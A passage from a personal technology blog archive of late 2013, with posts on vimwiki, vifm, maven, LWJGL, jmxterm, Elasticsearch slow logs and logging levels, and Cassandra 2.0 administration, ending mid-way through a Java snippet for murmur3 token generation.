Tuesday, December 31, 2013

Happy new year!

My software pick of 2013
* So the year is coming to an end, time to evaluate. When I look back at
2013 to see what software I used the most, compared to 2012, one piece of software
comes to mind: vimwiki, a personal wiki system for vim. I know it doesn't sound
like much, but it is just so much more. The wiki part refers to the way it uses
links: in the previous version vimwiki used CamelBack words to make a link; in the
latest, any word can be used as a link, and you can link to files on your pc
or on the web.

From the homepage: http://code.google.com/p/vimwiki/
* With vimwiki you can
* organize notes and ideas
* manage todo-lists
* write documentation

* I use it for many purposes: notes, blogs, todos, appointments, projects, etc.
Before vimwiki I used zim, a nice gui wiki, but the great thing with
vimwiki is that all the time I spent learning to navigate in vim pays off: I jump
around in my wiki-pages with a speed no gui tool can match, and everything is kept
in text files, so the footprint on the harddrive is very small.

* I have been using vimwiki for most of 2013 and my wiki-folder is only 392K, so
it's fast even if you put it on dropbox or a local server. vimwiki has many
options to fit your needs; look up the vimwiki help file to learn more. A nice
thing is that you can have as many wikis as you need, like one for work and
one private, or one for a single project. I can't encourage you enough to read the
help file, so you can get the most out of this handy tool. I use it all day,
every day. The speed and power of vim in a wiki-tool, it doesn't get better
than this.

* Thanks to habamax for this wonderful plugin.

* What is your software pick of 2013?

Cassandra cluster jmx metrics inspection to decide if cluster expansion is justifiable

One of the important decisions in managing clusters is determining when cluster capacity should be expanded. Maintaining a cluster at optimal performance keeps the applications working nicely and, most importantly, gives people confidence in the system.

So, to answer a question like "how do I determine if my cluster is at a bottleneck?", you will need to have measuring tools ready and to measure over time. That means displaying the statistics in graphical form; together with the history, this should give an indication of the cluster's performance.

Because this topic can grow huge, we will focus on a specific metric: this article inspects metrics exposed by the jmx beans. In order to inspect jmx metrics, you will need a jmx client. There is a gui jmx client that comes with the jdk, jconsole, but given the nature of this article, I would suggest you go for a cli jmx client, for example jmxterm. You can read an introduction to jmxterm here.

There are many metrics exposed by cassandra's jmx beans, but we will focus on the bean org.apache.cassandra.db:type=CompactionManager.

If you are using jmxterm, you can read the output below:
$ cat test.script 
open localhost:7199
bean org.apache.cassandra.db:type=CompactionManager
get PendingTasks
$ java -jar jmxterm-1.0-alpha-4-uber.jar -i test.script
Welcome to JMX terminal. Type "help" for available commands.
#Connection to localhost:7199 is opened
#bean is set to org.apache.cassandra.db:type=CompactionManager
#mbean = org.apache.cassandra.db:type=CompactionManager:
PendingTasks = 0;

So if you plot PendingTasks in a graph over time at a periodic interval, it should give insight into your cluster's performance. You can also plot the statistics output from nodetool tpstats. I would suggest you plot the Message type dropped counters too, as those metrics indicate over time that performance is being impacted. If you are running stock cassandra settings, this investigation and analysis of the graphs is the point at which you will probably want to start fine tuning your nodes.
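
As a minimal sketch of that periodic measurement (assuming, as in the jmxterm example above, that the node exposes JMX on localhost:7199 without authentication; the class name and the 10-second interval are my own choices), the same attribute can be polled with the JDK's standard JMX API:

import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

public class PendingTasksPoller {
    public static void main(String[] args) throws Exception {
        // standard JMX service URL for a cassandra node, same port as the jmxterm example
        JMXServiceURL url = new JMXServiceURL(
                "service:jmx:rmi:///jndi/rmi://localhost:7199/jmxrmi");
        JMXConnector connector = JMXConnectorFactory.connect(url);
        try {
            MBeanServerConnection mbs = connector.getMBeanServerConnection();
            ObjectName compactionManager =
                    new ObjectName("org.apache.cassandra.db:type=CompactionManager");
            // sample the attribute periodically; feed these lines to your graphing tool
            for (int i = 0; i < 6; i++) {
                Object pending = mbs.getAttribute(compactionManager, "PendingTasks");
                System.out.println(System.currentTimeMillis() + " PendingTasks=" + pending);
                Thread.sleep(10000L);
            }
        } finally {
            connector.close();
        }
    }
}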

There is no single best strategy; as mentioned earlier, you need experience, and there are many other measuring tools, for example sar, iostat, top, and your own application measurements. It takes some time to master all of these, but it is crucial if you manage a production cluster.

Thursday, December 26, 2013

cassandra 2.0 catch 101 – part5

Our cluster status.
Datacenter: datacenter1
=======================
Status=Up/Down
|/ State=Normal/Leaving/Joining/Moving
--  Address        Load       Tokens  Owns   Host ID                               Rack
UN  192.168.33.31  147.34 KB  512     34.3%  f13c9390-4c52-4fc2-afa8-f7f74e7fd710  rack1
UN  192.168.33.32  123.31 KB  512     33.2%  bc7fcfcc-9a30-4929-bf24-35ec770856a3  rack1
UN  192.168.33.33  160.74 KB  256     16.5%  999d58bf-2b31-49ff-a452-6f0d01598429  rack1
UN  192.168.33.34  137.39 KB  256     16.0%  222796e9-d330-469a-8dcd-3f3581c9d795  rack1

So it is pretty interesting that a node can own a different share of the cluster load based on the tokens specified. In our cluster environment we have different types of hardware, and mine, for instance, is pretty old. With our default settings, 512 tokens are assigned.

The setting for tokens can be found in cassandra.yaml
# This defines the number of tokens randomly assigned to this node on the ring
# The more tokens, relative to other nodes, the larger the proportion of data
# that this node will store. You probably want all nodes to have the same number
# of tokens assuming they have equal hardware capability.
#
# If you leave this unspecified, Cassandra will use the default of 1 token for legacy compatibility,
# and will use the initial_token as described below.
#
# Specifying initial_token will override this setting.
#
# If you already have a cluster with 1 token per node, and wish to migrate to
# multiple tokens per node, see http://wiki.apache.org/cassandra/Operations
num_tokens: 512

Just note that this setting applies only the first time a node joins the cluster. That is, on first join, 512 tokens are assigned to the node, and these tokens are stored in the keyspace system, in the column family local. Even if you remove the data directory and start all over, the data will be streamed from the other nodes, so the information still persists. If you really want to change it at a later date, it is possible: treat this node as dead by decommissioning it, stop the cassandra instance, change the num_tokens configuration in the yaml file, and then start the cassandra instance back up. Think this through first, because decommissioning streams data to other servers, which may create load on the system as well as network traffic.
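
As a rough sketch, the procedure described above amounts to the following (the node address is a placeholder for whichever node you are changing):

nodetool -h 192.168.33.31 decommission    # streams this node's data to the rest of the ring
# stop the cassandra instance, change num_tokens in cassandra.yaml,
# then start the cassandra instance back up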

Wednesday, December 25, 2013

Lightweight Java Game Library

Since childhood, gaming has been one of my favorite activities. If you are from the 80s, Super Mario should sound familiar to you. =) 30 years have passed, and game development has improved tremendously over that period.

In this article, we are going to explore game development. Most games are written in low level languages, for example C, and are thus very complicated; this certainly makes for a steep learning curve if you are a beginner. Hence, we will choose a simpler starting point to learn about game development. One library we can use is the Lightweight Java Game Library, or LWJGL for short.

What is Lightweight Java Game Library?

The Lightweight Java Game Library (LWJGL) is a solution aimed directly at professional and amateur Java programmers alike to enable commercial quality games to be written in Java. LWJGL provides developers access to high performance crossplatform libraries such as OpenGL (Open Graphics Library), OpenCL (Open Computing Language) and OpenAL (Open Audio Library) allowing for state of the art 3D games and 3D sound. Additionally LWJGL provides access to controllers such as Gamepads, Steering wheel and Joysticks. All in a simple and straight forward API.

Because this library by its nature deals with graphics display, the hardware display driver must be set up correctly. My workstation uses an ati radeon card with the xserver-xorg-video-radeon driver, with 3D acceleration enabled via the package libgl1-mesa-dri. We won't delve deep into graphics driver installation and configuration since our focus here is game development. You can check if your driver is set up properly by running glxgears in a terminal; if a window pops up with three gears spinning, your driver installation and setup should be fine for this coding tutorial.

The official wiki is well written and documents how to get started. Following it, I have set up my eclipse environment on debian sid. The required library should be added to the project build path so that it is detected when you run your application. Because I'm running linux, the native library location points to lwjgl-2.9.1/native/linux. Both of these must be configured before any development begins. If you noticed, I've set up the source attachment as well; it is convenient to be able to read the code if you need to check something later down the road during the coding phase.



There are many tutorials to pick from; as a start, I just picked the basics, LWJGL Basics 1 (The Display). The source code is in the link, and it is incredibly easy to create the display with a few lines of code. I got the window to display on my first try. Very impressive and promising.
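
For reference, a minimal sketch along the lines of that tutorial is below; the window size and title are my own choices, and you run it with -Djava.library.path pointing at the natives directory mentioned above.

import org.lwjgl.LWJGLException;
import org.lwjgl.opengl.Display;
import org.lwjgl.opengl.DisplayMode;

public class DisplayExample {
    public static void main(String[] args) {
        try {
            // request an 800x600 window and create the OpenGL context
            Display.setDisplayMode(new DisplayMode(800, 600));
            Display.setTitle("LWJGL Basics 1");
            Display.create();
        } catch (LWJGLException e) {
            e.printStackTrace();
            return;
        }
        // keep the window open until the user closes it
        while (!Display.isCloseRequested()) {
            Display.update(); // swaps buffers and processes window events
        }
        Display.destroy();
    }
}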



It is pretty impressive what this library can do. There are many examples bundled with the library, and one of them is an example game. Just execute
java -cp .:res:jar/lwjgl.jar:jar/lwjgl_test.jar:jar/lwjgl_util.jar:jar/jinput.jar: -Djava.library.path=native/linux org.lwjgl.examples.spaceinvaders.Game

if you are running linux. It ran fine in my environment and I played the bundled game; amazing. Maybe in my next article, I'm gonna try to complete it.

Monday, December 23, 2013

Elasticsearch index slow log for search and indexing

Today, we are going to learn about elasticsearch's slow logging for search and indexing. The elasticsearch config file, elasticsearch.yml, should have a configuration section such as the one below:
################################## Slow Log ##################################

# Shard level query and fetch threshold logging.

#index.search.slowlog.threshold.query.warn: 10s
#index.search.slowlog.threshold.query.info: 5s
#index.search.slowlog.threshold.query.debug: 2s
index.search.slowlog.threshold.query.trace: 500ms

#index.search.slowlog.threshold.fetch.warn: 1s
#index.search.slowlog.threshold.fetch.info: 800ms
#index.search.slowlog.threshold.fetch.debug: 500ms
index.search.slowlog.threshold.fetch.trace: 200ms

#index.indexing.slowlog.threshold.index.warn: 10s
#index.indexing.slowlog.threshold.index.info: 5s
#index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

So with this example, I have enabled tracing for the search query and search fetch phases with thresholds of 500ms and 200ms respectively. A search in elasticsearch consists of a query phase and a fetch phase, hence the two configurations for search. Meanwhile, slow logging for indexing is also enabled, with a threshold of 500ms.

With these configurations set, if your indexing or search exceeds a threshold,
an entry is logged to a file. The log file is located under the path.logs
directory set in elasticsearch.yml.

So what do the numbers really mean? An excerpt from the official elasticsearch documentation:

The logging is done on the shard level scope, meaning the execution of a search request within a specific shard. It does not encompass the whole search request, which can be broadcast to several shards in order to execute. Some of the benefits of shard level logging is the association of the actual execution on the specific machine, compared with request level.


 

All settings are index level settings (and each index can have different values for it), and can be changed in runtime using the index update settings API.


 

... and I have tried updating the index setting via a simple tool I made earlier on. The idea is the same: you just need to make an http call that puts the variable into the index settings. You can find more information here. The keys for the configuration are available in the ShardSlowLogSearchService.java class.
[jason@node1 bin]$ ./indices-setting.sh set search.slowlog.threshold.query.trace 500
{
"ok" : true,
"acknowledged" : true
}
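
If you are not using such a tool, the equivalent call with plain curl against the index update settings API should look roughly like this (the index name index_test is taken from the log entry below):

curl -XPUT 'localhost:9200/index_test/_settings' -d '{
"index.search.slowlog.threshold.query.trace" : "500ms"
}'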

[2013-12-23 12:31:12,758][TRACE][index.search.slowlog.query] [node1] [index_test][146] took[1s], took_millis[1026], types[foo,bar], stats[], search_type[QUERY_THEN_FETCH], total_shards[90], source[{"size":80,"timeout":10000,"query":{"filtered":{"query":{"query_string":{"query":"maxis*","default_operator":"and"}},"filter":{"and":{"filters":[{"query":{"match":{"site":{"query":"www.google.com","type":"boolean"}}}},{"range":{"unixtimestamp":{"from":null,"to":1387825199000,"include_lower":true,"include_upper":true}}}]}}}},"filter":{"query":{"match":{"site":{"query":"www.google.com","type":"boolean"}}}},"sort":[{"unixtimestamp":{"order":"desc"}}]}], extra_source[],

In this example, the query exceeded the threshold set at 500ms: it ran for 1 second.

As for indexing, the fundamental concept is the same, so we won't elaborate further in this article; that is left to you as an exercise. :-)

Sunday, December 22, 2013

Learning Jmxterm

If you have been using jconsole to inspect an application running under the jvm, you might want an alternative in command line form. In this article, we are going to spend some time learning Jmxterm. So what is Jmxterm? Jmxterm is a command line based interactive JMX client. It's designed to allow users to access a Java MBean server from the command line without a graphical environment. In other words, it's a command line based jconsole.

To get started, you will of course need the JDK installed and a java application that you want to inspect. Go to http://wiki.cyclopsgroup.org/jmxterm/download and download the tool. You should end up with a jmxterm-[version].jar file.

So, I'm gonna demonstrate how to use Jmxterm by showing an example terminal session.
$ java -jar jmxterm-1.0-alpha-4-uber.jar
Welcome to JMX terminal. Type "help" for available commands.
$>help;
#IllegalArgumentException: Command help; isn't valid, run help to see available commands
$>help
#following commands are available to use:
about - Display about page
bean - Display or set current selected MBean.
beans - List available beans under a domain or all domains
bye - Terminate console and exit
close - Close current JMX connection
domain - Display or set current selected domain.
domains - List all available domain names
exit - Terminate console and exit
get - Get value of MBean attribute(s)
help - Display available commands or usage of a command
info - Display detail information about an MBean
jvms - List all running local JVM processes
open - Open JMX session or display current connection
option - Set options for command session
quit - Terminate console and exit
run - Invoke an MBean operation
set - Set value of an MBean attribute
$> bean
null
$>beans
#IllegalStateException: Connection isn't open yet. Run open command to open a connection
$>domains
#following domains are available
#IllegalStateException: Connection isn't open yet. Run open command to open a connection
$>jvms
5552 ( ) - jmxterm-1.0-alpha-4-uber.jar
$>help open
usage: open [-h] [-p <val>] [-u <val>]
Open JMX session or display current connection
-h,--help Display usage
-p,--password <val> Password for user/password authentication
-u,--user <val> User name for user/password authentication
Without argument this command display current connection. URL can be a <PID>,
<hostname>:<port> or full qualified JMX service URL. For example
open localhost:9991,
open jmx:service:...
$>open 192.168.0.2:7199
#RuntimeIOException: Runtime IO exception: Connection refused to host: 127.0.0.1; nested exception is:
java.net.ConnectException: Connection refused
$>open localhost:7199
#Connection to localhost:7199 is opened
$>bean
null
$>bean org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
#bean is set to org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
$>info
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
#class name = org.apache.cassandra.db.ColumnFamilyStore
# attributes
%0 - AutoCompactionDisabled (boolean, r)
%1 - BloomFilterDiskSpaceUsed (long, r)
%2 - BloomFilterFalsePositives (long, r)
%3 - BloomFilterFalseRatio (double, r)
%4 - BuiltIndexes (java.util.List, r)
%5 - ColumnFamilyName (java.lang.String, r)
%6 - CompactionStrategyClass (java.lang.String, rw)
%7 - CompressionParameters (java.util.Map, rw)
%8 - CompressionRatio (double, r)
%9 - CrcCheckChance (double, w)
%10 - DroppableTombstoneRatio (double, r)
%11 - EstimatedColumnCountHistogram ([J, r)
%12 - EstimatedRowSizeHistogram ([J, r)
%13 - LifetimeReadLatencyHistogramMicros ([J, r)
%14 - LifetimeWriteLatencyHistogramMicros ([J, r)
%15 - LiveCellsPerSlice (double, r)
%16 - LiveDiskSpaceUsed (long, r)
%17 - LiveSSTableCount (int, r)
%18 - MaxRowSize (long, r)
%19 - MaximumCompactionThreshold (int, rw)
%20 - MeanRowSize (long, r)
%21 - MemtableColumnsCount (long, r)
%22 - MemtableDataSize (long, r)
%23 - MemtableSwitchCount (int, r)
%24 - MinRowSize (long, r)
%25 - MinimumCompactionThreshold (int, rw)
%26 - PendingTasks (int, r)
%27 - ReadCount (long, r)
%28 - RecentBloomFilterFalsePositives (long, r)
%29 - RecentBloomFilterFalseRatio (double, r)
%30 - RecentReadLatencyHistogramMicros ([J, r)
%31 - RecentReadLatencyMicros (double, r)
%32 - RecentSSTablesPerReadHistogram ([J, r)
%33 - RecentWriteLatencyHistogramMicros ([J, r)
%34 - RecentWriteLatencyMicros (double, r)
%35 - SSTableCountPerLevel ([I, r)
%36 - SSTablesPerReadHistogram ([J, r)
%37 - TombstonesPerSlice (double, r)
%38 - TotalDiskSpaceUsed (long, r)
%39 - TotalReadLatencyMicros (long, r)
%40 - TotalWriteLatencyMicros (long, r)
%41 - UnleveledSSTables (int, r)
%42 - WriteCount (long, r)
# operations
%0 - long estimateKeys()
%1 - void forceMajorCompaction()
%2 - java.util.List getSSTablesForKey(java.lang.String p1)
%3 - void loadNewSSTables()
%4 - void setCompactionThresholds(int p1,int p2)
#there's no notifications
$>get WriteCount
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies:
WriteCount = 0;
$>get TotalDiskSpaceUsed
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies:
TotalDiskSpaceUsed = 9437;

So, a brief explanation of what I have just done. To start, you run Jmxterm from a terminal. To understand what commands it has and what they can be used for, simply issue the command help. In order to inspect anything, you need to open a connection to the jvm. Once a connection is established, you can do all sorts of operations; in this example, I connected to cassandra, inspected its bean org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies, and got the WriteCount and TotalDiskSpaceUsed statistics.

That's all folks! I hope you got an idea of what it does and where it might be applicable for you.

Saturday, December 21, 2013

vifm a true gem

filemanager goes vim


  * A ncurses file manager with a vim-like UI; as a vim user you will feel right
at home. Commands like dd delete a line just like in vim, and you can move to the
other window and type p to paste the line in the "clipboard" there. The normal
movement commands hjkl work as expected: j/k move down/up an item in the list and
h/l move up/down a directory. Like in vim, most settings are made in its rc file;
the vifmrc is in ~/.vifm. To get an idea about all the options you have in vifm, go
to http://vifm.sourceforge.net/docs.html#OPTIONS. It's amazing what you can do
with vifm; if you, like me, have been using vim for some time, this filemanager is
a true gem. And much like vim, the options are "endless". Browse the project
homepage or github.com, where you will find the sourcecode/setup and help to make
your own setup. I often look at configs/setups on github to get ideas and maybe
improve my own.

* The documentation for vifm is at http://vifm.sourceforge.net/docs.html.

* I must say, after using vifm for some time, doing some github'ing, and making my
own vifmrc with some nice filetype settings and hard-bookmarks: it's like vim, the
more you use it and add to your rc file, the better and faster it gets.

  * So thanks to ksteen & xaizek for this power-tool.
It doesn't look like much, but it is ;)

Friday, December 20, 2013

A maven introduction.

So recently, I have been working on an opensource project and stumbled upon maven. I'm an ant guy (with an ant background), and guessed that maven should not be that difficult to start using.

When you see a pom.xml file in a java project, that tells you the project is built with maven; pom.xml is the maven configuration file. For instance, a simple java project would look like:
project home
├── src
│   ├── main
│   │   ├── java
│   │   └── resources
│   └── test
│       ├── java
│       └── resources
├── target
└── pom.xml

The most basic command that you are ever gonna use, and use very often, is probably:

mvn package

With the above command, mvn will compile your classes, run any tests, and package the deliverable code and resources into target/my-app-1.0.jar. If mvn produces this jar, that is often all you need, and the developer can concentrate on the java project itself.

But if you are adventurous and want to know more about maven, read on. There are several maven phases at which you can issue a command. The following is the standard maven lifecycle, as an ordered list of phases:

  • process-resources

  • compile

  • process-test-resources

  • test-compile

  • test

  • package

  • install

  • deploy


So, in order to satisfy the library dependencies of your project, you specify the coordinates of the libraries it depends on in pom.xml, as sketched below. You can use this site to search for the libraries you depend on.
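
As a sketch, a minimal pom.xml for the my-app project above, with a single illustrative dependency (the junit coordinates here are only an example), might look like this:

<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>my-app</artifactId>
  <version>1.0</version>
  <dependencies>
    <!-- illustrative dependency; mvn package runs tests compiled against it -->
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.11</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
</project>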

I hope this provides a simple start for using maven to assist in your java project. If you have reached this point and have further questions, see this link and this link.

Changing ElasticSearch logging level by updating cluster setting.

In this article, we are going to learn how to update the logging level for all the nodes in an elasticsearch cluster. Logging is crucial for understanding system behaviour, so from time to time you change the logging level in elasticsearch via elasticsearch.yml and restart the elasticsearch instance so that the new logging level is picked up. Unfortunately a restart in live production takes some time (because of shard recovery), and this is not efficient.

Luckily, there is a cluster setting which allows the logging level to be changed on the fly.

So with that, if you want to understand what's happening in the cluster nodes, you can change the logging level,

e.g.
curl -XPUT localhost:9200/_cluster/settings -d '{
"transient" : {
"logger.cluster.service" : "DEBUG"
}
}'

and tail the elasticsearch log; you should see log entries start appearing. Because logging is managed by the class NodeSettingsService, you should read into the elasticsearch packages that are initialized with this class. Example elasticsearch packages: cluster.service, cluster.routing.allocation.allocator, indices.ttl.IndicesTTLService, etc. Note that the package prefix org.elasticsearch is not needed when the setting is updated.

If you want more information, this link provides further help.

Friday, December 6, 2013

cassandra 2.0 catch 101 – part4

It has been a while since I last posted, mainly due to an abundance of work. :-( In this article, I'm gonna share lessons learned on cassandra 2.0.2 using cqlsh 4.1.0.

Recently we had to remove all the files in /var/lib/cassandra/, simply because something broke when we upgraded from cassandra 2.0.0 to 2.0.2 and nobody on the team had the time to go into the details. Since this is a just4fun cluster, we agreed to remove the dir /var/lib/cassandra/ and start the cluster fresh on cassandra 2.0.2.

In order to better understand cassandra, we will take a detailed look at alter table. But before that, let's create a new keyspace and table.
cqlsh> CREATE KEYSPACE jw_schema1 WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};
cqlsh>

and the corresponding entry in cassandra's system.log:

INFO [Thrift:7] 2013-12-06 16:17:21,902 MigrationManager.java (line 217) Create new Keyspace: jw_schema1, rep strategy:SimpleStrategy{}, strategy_options: {replication_factor=3}, durable_writes: true

cassandra 2.0 catch 101 – part3

Many of us come from a mysql / postgres background, and we quickly interface with the database using the command line. Commenting in cassandra cql is different than in sql. Read the example below:
cqlsh:jw_schema1> #select * from users;
Invalid syntax at line 1, char 1
#select * from users;
^
cqlsh:jw_schema1> --select * from users;
cqlsh:jw_schema1> -select * from users;
Bad Request: line 1:0 no viable alternative at input '-'
cqlsh:jw_schema1> -- select * from users;
cqlsh:jw_schema1>

So as you can see, the hash glyph does not work in cqlsh; you need to put double dashes in front of the comment you want to make.

Voila! =)

Saturday, November 30, 2013

how does read performance gain from compression?

I read the following interesting discussion on the cassandra mailing list, thought it was a very good explanation, and would like to share it.

how does read performance gains when in compression?
http://www.datastax.com/dev/blog/whats-new-in-cassandra-1-0-compression
http://www.datastax.com/documentation/cassandra/1.2/webhelp/index.html?pagename=docs&version=1.2&file=index#cassandra/dml/dml_about_reads_c.html

Cite from Artur Kronenberg
The way I understand it is that compression gives you the advantage of having to use way less IO and rather use CPU. The bottleneck of reads is usually the IO time you need to read the data from disk. As a figure, we had about 25 reads/s reading from disk, while we get up to 3000 reads/s when we have all of it in cache. So having good compression reduces the amount you have to read from disk. Rather you may spend a little bit more time decompressing data, but this data will be in cache anyways so it won't matter.

Cite from Edward Capriolo
The big * in the explanation: Smaller file size footprint leads to better disk cache, however decompression adds work for the JVM to do and increases the churn of objects in the JVM. Additionally compression block sizes might be 4KB while for some use cases a small row may be 200bytes. This means that internally a large block might be decompressed to get at the row inside of it.

In many use cases compression is a performance win, but not necessarily in all cases. In particular if you are already doing JVM performance tuning issues to stop garbage collection pauses enabling compression could make performance worse.

Thursday, November 14, 2013

C++ "hello world" (test syntax highlight)

#include <iostream>

int main()
{
    std::cout << "hello world" << std::endl;

    return 0;
}

Wednesday, November 13, 2013

cassandra 2.0 catch 101 – part2

After playing around with cassandra 2.0 for quite some time, in this article I'm gonna share with you a strange issue I encountered: being unable to drop a table no matter what.

I'm using the stress tool in the cassandra package to create the column families. It seems that the keyspace and tables were created successfully. Following is the output.


Created keyspaces. Sleeping 1s for propagation.
total,interval_op_rate, interval_key_rate,latency,95th,99.9th,elapsed_time
..
..
..


So everything seems to have been created okay in cassandra.


cqlsh:system> desc keyspaces;

jw_schema1 system system_traces

cqlsh:system> use jw_schema1;
cqlsh:jw_schema1> desc tables;

Counter1 Counter3 Standard1 Super1 SuperCounter1

cqlsh:jw_schema1> desc table Counter1;

CREATE TABLE "Counter1" (
key blob,
column1 ascii,
value counter,
PRIMARY KEY (key, column1)
) WITH COMPACT STORAGE AND
bloom_filter_fp_chance=0.010000 AND
caching='KEYS_ONLY' AND
comment='' AND
dclocal_read_repair_chance=0.000000 AND
gc_grace_seconds=864000 AND
index_interval=128 AND
read_repair_chance=0.100000 AND
replicate_on_write='true' AND
populate_io_cache_on_flush='false' AND
default_time_to_live=0 AND
speculative_retry='NONE' AND
memtable_flush_period_in_ms=0 AND
compaction={'class': 'SizeTieredCompactionStrategy'} AND
compression={};

cqlsh:jw_schema1>




When selecting from or dropping any of the tables within the keyspace, things started to go wrong, while the cassandra server debug log showed nothing unusual.
cqlsh:jw_schema1> select * from Counter1;
Bad Request: unconfigured columnfamily counter1
cqlsh:jw_schema1>

DEBUG [Thrift:105] 2013-11-13 20:55:29,050 CassandraServer.java (line 1932) execute_cql3_query
DEBUG [Thrift:105] 2013-11-13 20:55:29,050 Tracing.java (line 159) request complete

cqlsh:jw_schema1> drop table Counter1;
Bad Request: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
cqlsh:jw_schema1>

DEBUG [Thrift:105] 2013-11-13 20:55:59,392 CassandraServer.java (line 1932) execute_cql3_query
DEBUG [Thrift:105] 2013-11-13 20:55:59,393 Tracing.java (line 159) request complete

and the same happens via the datastax java binary driver:
// imports assumed: com.datastax.driver.core.* and com.datastax.driver.core.policies.*
private Cluster cluster;
private Session session;

public void connect(String node) {
    cluster = Cluster.builder().addContactPoint(node)
            .addContactPoints("127.0.0.1")
            .withRetryPolicy(DowngradingConsistencyRetryPolicy.INSTANCE)
            .withReconnectionPolicy(new ConstantReconnectionPolicy(100L)).build();
    session = cluster.connect("jw_schema1");

    // this is the call that fails with the InvalidQueryException below
    ExecutionInfo info = session.execute("DROP TABLE Counter1").getExecutionInfo();
}

 
Exception in thread "main" com.datastax.driver.core.exceptions.InvalidQueryException: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
at com.datastax.driver.core.exceptions.InvalidQueryException.copy(InvalidQueryException.java:35)
at com.datastax.driver.core.ResultSetFuture.extractCauseFromExecutionException(ResultSetFuture.java:271)
at com.datastax.driver.core.ResultSetFuture.getUninterruptibly(ResultSetFuture.java:187)
at com.datastax.driver.core.Session.execute(Session.java:126)
at com.datastax.driver.core.Session.execute(Session.java:77)
at foo.bar.main.SimpleClient.connect(SimpleClient.java:38)
at foo.bar.main.SimpleClient.main(SimpleClient.java:69)
Caused by: com.datastax.driver.core.exceptions.InvalidConfigurationInQueryException: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
at com.datastax.driver.core.Responses$Error.asException(Responses.java:97)
at com.datastax.driver.core.ResultSetFuture$ResponseCallback.onSet(ResultSetFuture.java:122)
at com.datastax.driver.core.RequestHandler.setFinalResult(RequestHandler.java:217)
at com.datastax.driver.core.RequestHandler.onSet(RequestHandler.java:349)
at com.datastax.driver.core.Connection$Dispatcher.messageReceived(Connection.java:500)
at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:75)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:793)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:296)
at org.jboss.netty.handler.codec.oneone.OneToOneDecoder.handleUpstream(OneToOneDecoder.java:71)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:793)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:296)
at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(FrameDecoder.java:458)
at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(FrameDecoder.java:439)
at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(FrameDecoder.java:303)
at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:75)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:560)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:268)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:255)
at org.jboss.netty.channel.socket.nio.NioWorker.read(NioWorker.java:84)
at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(AbstractNioWorker.java:472)
at org.jboss.netty.channel.socket.nio.AbstractNioWorker.run(AbstractNioWorker.java:333)
at org.jboss.netty.channel.socket.nio.NioWorker.run(NioWorker.java:35)
at org.jboss.netty.util.ThreadRenamingRunnable.run(ThreadRenamingRunnable.java:102)
at org.jboss.netty.util.internal.DeadLockProofWorker$1.run(DeadLockProofWorker.java:42)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:722)

So I'm not sure what went wrong, but I ended up dropping the keyspace as a workaround.
cqlsh:system> drop keyspace jw_schema1;
cqlsh:system>





work around: as the session below shows, a keyspace created with a quoted, mixed-case name must be quoted again when it is referenced. Presumably the same quoting, e.g. drop table "Counter1";, would have worked for the table as well.
cqlsh:system> desc keyspaces;

TestKeyspace system system_traces

cqlsh:system> drop keyspace TestKeyspace;
Bad Request: Cannot drop non existing keyspace 'testkeyspace'.
cqlsh:system> drop keyspace "TestKeyspace";
cqlsh:system> desc keyspaces;

system system_traces

cqlsh:system>

 

Friday, October 18, 2013

How to generate murmur3 in cassandra2.0

Reading into this doc, I got really curious about how the murmur3 hash value is generated.

So I dug into the cassandra github and found this class; it seems that cassandra 2.0 generates the token for the primary key using the method hash3_x64_128. Below is the code to get it working; just put it into a java class and watch the token being generated.

    

import java.nio.ByteBuffer;

import org.apache.cassandra.dht.Murmur3Partitioner.LongToken;
import org.apache.cassandra.utils.ByteBufferUtil;
import org.apache.cassandra.utils.MurmurHash;

public class TokenGen {
    public static LongToken genToken(String rowKey) {
        ByteBuffer key = ByteBufferUtil.bytes(rowKey);
